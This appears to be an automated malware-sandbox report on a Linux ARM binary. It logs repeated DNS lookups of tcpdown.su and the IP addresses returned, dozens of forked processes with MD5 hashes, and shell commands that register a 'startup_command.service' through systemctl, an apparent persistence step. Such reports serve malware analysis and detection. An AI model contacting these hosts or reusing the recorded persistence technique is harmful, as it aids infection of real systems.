                                                        Jan 1, 2025 17:03:57.847225904 CET53407471.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:03:57.847929001 CET5570053192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:03:57.863715887 CET53557001.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:03:57.864423037 CET4593353192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:03:57.879333019 CET53459331.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:03:57.880044937 CET4166253192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:02.885230064 CET4514553192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:07.890177011 CET4215053192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:12.893871069 CET5935053192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:17.898885965 CET5973653192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:24.439013958 CET4749253192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:24.446485043 CET53474921.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:24.447242975 CET3605053192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:24.461786985 CET53360501.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:24.462749958 CET5463853192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:24.471155882 CET53546381.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:24.472114086 CET4772053192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:24.480297089 CET53477201.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:24.481281996 CET3844653192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:24.494693995 CET53384461.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:24.495580912 CET3679853192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:29.501066923 CET4275353192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:34.504390955 CET5067453192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:39.507999897 CET5964253192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:44.514460087 CET3746253192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:51.051847935 CET3780853192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:51.058804035 CET53378081.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:51.059751987 CET5880753192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:51.074188948 CET53588071.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:51.074942112 CET5736753192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:51.090023041 CET53573671.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:51.090981007 CET6029953192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:51.099242926 CET53602991.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:51.100244999 CET4192253192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:51.107275009 CET53419221.1.1.1192.168.2.23
                                                        Jan 1, 2025 17:04:51.108217955 CET4766953192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:04:56.113416910 CET3752253192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:05:01.116621017 CET3910953192.168.2.231.1.1.1
                                                        Jan 1, 2025 17:05:06.121097088 CET5808153192.168.2.231.1.1.1
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 1, 2025 17:03:02.558923960 CET192.168.2.231.1.1.10xfc39Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.770430088 CET192.168.2.231.1.1.10xfc42Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.784813881 CET192.168.2.231.1.1.10xfc42Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.812990904 CET192.168.2.231.1.1.10xfc42Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.837194920 CET192.168.2.231.1.1.10xfc42Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.856570959 CET192.168.2.231.1.1.10xfc42Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.450525999 CET192.168.2.231.1.1.10x1859Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.477440119 CET192.168.2.231.1.1.10x1859Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.495845079 CET192.168.2.231.1.1.10x1859Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.516205072 CET192.168.2.231.1.1.10x1859Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.544254065 CET192.168.2.231.1.1.10x1859Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.572638988 CET192.168.2.231.1.1.10x5dfStandard query (0)tcpdown.suo. [malformed]256315false
                                                        Jan 1, 2025 17:03:09.579826117 CET192.168.2.231.1.1.10x5dfStandard query (0)tcpdown.suo. [malformed]256317false
                                                        Jan 1, 2025 17:03:14.586257935 CET192.168.2.231.1.1.10x5dfStandard query (0)tcpdown.suo. [malformed]256325false
                                                        Jan 1, 2025 17:03:19.591686010 CET192.168.2.231.1.1.10x5dfStandard query (0)tcpdown.suo. [malformed]256329false
                                                        Jan 1, 2025 17:03:24.596954107 CET192.168.2.231.1.1.10x5dfStandard query (0)tcpdown.suo. [malformed]256335false
                                                        Jan 1, 2025 17:03:31.135330915 CET192.168.2.231.1.1.10x18d2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.151187897 CET192.168.2.231.1.1.10x18d2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.160145044 CET192.168.2.231.1.1.10x18d2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.175554991 CET192.168.2.231.1.1.10x18d2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.199445963 CET192.168.2.231.1.1.10x18d2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.207479000 CET192.168.2.231.1.1.10x2867Standard query (0)tcpdown.suo. [malformed]256340false
                                                        Jan 1, 2025 17:03:36.212766886 CET192.168.2.231.1.1.10x2867Standard query (0)tcpdown.suo. [malformed]256345false
                                                        Jan 1, 2025 17:03:41.215825081 CET192.168.2.231.1.1.10x2867Standard query (0)tcpdown.suo. [malformed]256351false
                                                        Jan 1, 2025 17:03:46.219352007 CET192.168.2.231.1.1.10x2867Standard query (0)tcpdown.suo. [malformed]256359false
                                                        Jan 1, 2025 17:03:51.224611044 CET192.168.2.231.1.1.10x2867Standard query (0)tcpdown.suo. [malformed]256359false
                                                        Jan 1, 2025 17:03:57.802114964 CET192.168.2.231.1.1.10xc4d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.817004919 CET192.168.2.231.1.1.10xc4d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.832652092 CET192.168.2.231.1.1.10xc4d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.847929001 CET192.168.2.231.1.1.10xc4d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.864423037 CET192.168.2.231.1.1.10xc4d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.880044937 CET192.168.2.231.1.1.10xa8dbStandard query (0)tcpdown.suo. [malformed]256366false
                                                        Jan 1, 2025 17:04:02.885230064 CET192.168.2.231.1.1.10xa8dbStandard query (0)tcpdown.suo. [malformed]256374false
                                                        Jan 1, 2025 17:04:07.890177011 CET192.168.2.231.1.1.10xa8dbStandard query (0)tcpdown.suo. [malformed]256380false
                                                        Jan 1, 2025 17:04:12.893871069 CET192.168.2.231.1.1.10xa8dbStandard query (0)tcpdown.suo. [malformed]256381false
                                                        Jan 1, 2025 17:04:17.898885965 CET192.168.2.231.1.1.10xa8dbStandard query (0)tcpdown.suo. [malformed]256389false
                                                        Jan 1, 2025 17:04:24.439013958 CET192.168.2.231.1.1.10xc529Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.447242975 CET192.168.2.231.1.1.10xc529Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.462749958 CET192.168.2.231.1.1.10xc529Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.472114086 CET192.168.2.231.1.1.10xc529Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.481281996 CET192.168.2.231.1.1.10xc529Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.495580912 CET192.168.2.231.1.1.10xb0c8Standard query (0)tcpdown.suo. [malformed]256396false
                                                        Jan 1, 2025 17:04:29.501066923 CET192.168.2.231.1.1.10xb0c8Standard query (0)tcpdown.suo. [malformed]256402false
                                                        Jan 1, 2025 17:04:34.504390955 CET192.168.2.231.1.1.10xb0c8Standard query (0)tcpdown.suo. [malformed]256404false
                                                        Jan 1, 2025 17:04:39.507999897 CET192.168.2.231.1.1.10xb0c8Standard query (0)tcpdown.suo. [malformed]256411false
                                                        Jan 1, 2025 17:04:44.514460087 CET192.168.2.231.1.1.10xb0c8Standard query (0)tcpdown.suo. [malformed]256417false
                                                        Jan 1, 2025 17:04:51.051847935 CET192.168.2.231.1.1.10x40fdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.059751987 CET192.168.2.231.1.1.10x40fdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.074942112 CET192.168.2.231.1.1.10x40fdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.090981007 CET192.168.2.231.1.1.10x40fdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.100244999 CET192.168.2.231.1.1.10x40fdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.108217955 CET192.168.2.231.1.1.10xb429Standard query (0)tcpdown.suo. [malformed]256419false
                                                        Jan 1, 2025 17:04:56.113416910 CET192.168.2.231.1.1.10xb429Standard query (0)tcpdown.suo. [malformed]256426false
                                                        Jan 1, 2025 17:05:01.116621017 CET192.168.2.231.1.1.10xb429Standard query (0)tcpdown.suo. [malformed]256434false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 1, 2025 17:03:02.765268087 CET1.1.1.1192.168.2.230xfc39No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.765268087 CET1.1.1.1192.168.2.230xfc39No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.765268087 CET1.1.1.1192.168.2.230xfc39No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.765268087 CET1.1.1.1192.168.2.230xfc39No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.765268087 CET1.1.1.1192.168.2.230xfc39No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.765268087 CET1.1.1.1192.168.2.230xfc39No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.765268087 CET1.1.1.1192.168.2.230xfc39No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.779619932 CET1.1.1.1192.168.2.230xfc42Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.808614969 CET1.1.1.1192.168.2.230xfc42Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.832026958 CET1.1.1.1192.168.2.230xfc42Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.851816893 CET1.1.1.1192.168.2.230xfc42Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:02.879432917 CET1.1.1.1192.168.2.230xfc42Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.465689898 CET1.1.1.1192.168.2.230x1859Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.488974094 CET1.1.1.1192.168.2.230x1859Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.510695934 CET1.1.1.1192.168.2.230x1859Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.524811029 CET1.1.1.1192.168.2.230x1859Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:04.563035965 CET1.1.1.1192.168.2.230x1859Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.150506973 CET1.1.1.1192.168.2.230x18d2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.159579039 CET1.1.1.1192.168.2.230x18d2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.174869061 CET1.1.1.1192.168.2.230x18d2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.198719025 CET1.1.1.1192.168.2.230x18d2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:31.206765890 CET1.1.1.1192.168.2.230x18d2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.816333055 CET1.1.1.1192.168.2.230xc4d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.831712008 CET1.1.1.1192.168.2.230xc4d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.847225904 CET1.1.1.1192.168.2.230xc4d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.863715887 CET1.1.1.1192.168.2.230xc4d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:03:57.879333019 CET1.1.1.1192.168.2.230xc4d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.446485043 CET1.1.1.1192.168.2.230xc529Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.461786985 CET1.1.1.1192.168.2.230xc529Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.471155882 CET1.1.1.1192.168.2.230xc529Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.480297089 CET1.1.1.1192.168.2.230xc529Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:24.494693995 CET1.1.1.1192.168.2.230xc529Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.058804035 CET1.1.1.1192.168.2.230x40fdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.074188948 CET1.1.1.1192.168.2.230x40fdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.090023041 CET1.1.1.1192.168.2.230x40fdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.099242926 CET1.1.1.1192.168.2.230x40fdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                        Jan 1, 2025 17:04:51.107275009 CET1.1.1.1192.168.2.230x40fdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false

                                                        System Behavior

                                                        Start time (UTC):16:02:58
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:/tmp/arm.elf
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:02:59
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:02:59
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:09
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:09
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:09
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:11
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:11
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:11
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:16
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:16
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:21
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:21
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:26
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:26
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:31
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:31
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:36
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:36
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:42
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:42
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:51
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:51
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:57
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:57
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:06
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:06
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:12
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:12
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:21
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:21
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:27
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:27
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:27
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:36
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:36
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:42
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:42
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:51
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:51
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:57
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:04:57
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:02:59
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:02:59
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:02:59
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:02:59
                                                        Start date (UTC):01/01/2025
                                                        Path:/bin/sh
                                                        Arguments:sh -c "systemctl daemon-reload"
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):16:02:59
                                                        Start date (UTC):01/01/2025
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):16:02:59
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/bin/systemctl
                                                        Arguments:systemctl daemon-reload
                                                        File size:996584 bytes
                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                        Start time (UTC):16:03:00
                                                        Start date (UTC):01/01/2025
                                                        Path:/tmp/arm.elf
                                                        Arguments:-
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                        Start time (UTC):16:03:00
                                                        Start date (UTC):01/01/2025
                                                        Path:/bin/sh
                                                        Arguments:sh -c "systemctl enable startup_command.service"
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):16:03:00
                                                        Start date (UTC):01/01/2025
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):16:03:00
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/bin/systemctl
                                                        Arguments:systemctl enable startup_command.service
                                                        File size:996584 bytes
                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                        Start time (UTC):16:03:00
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/lib/systemd/systemd
                                                        Arguments:-
                                                        File size:1620224 bytes
                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                        Start time (UTC):16:03:00
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                        File size:22760 bytes
                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                        Start time (UTC):16:03:01
                                                        Start date (UTC):01/01/2025
                                                        Path:/usr/lib/systemd/systemd
                                                        Arguments:-
                                                        File size:1620224 bytes
                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                        Start time (UTC):16:03:01
                                                        Start date (UTC):01/01/2025
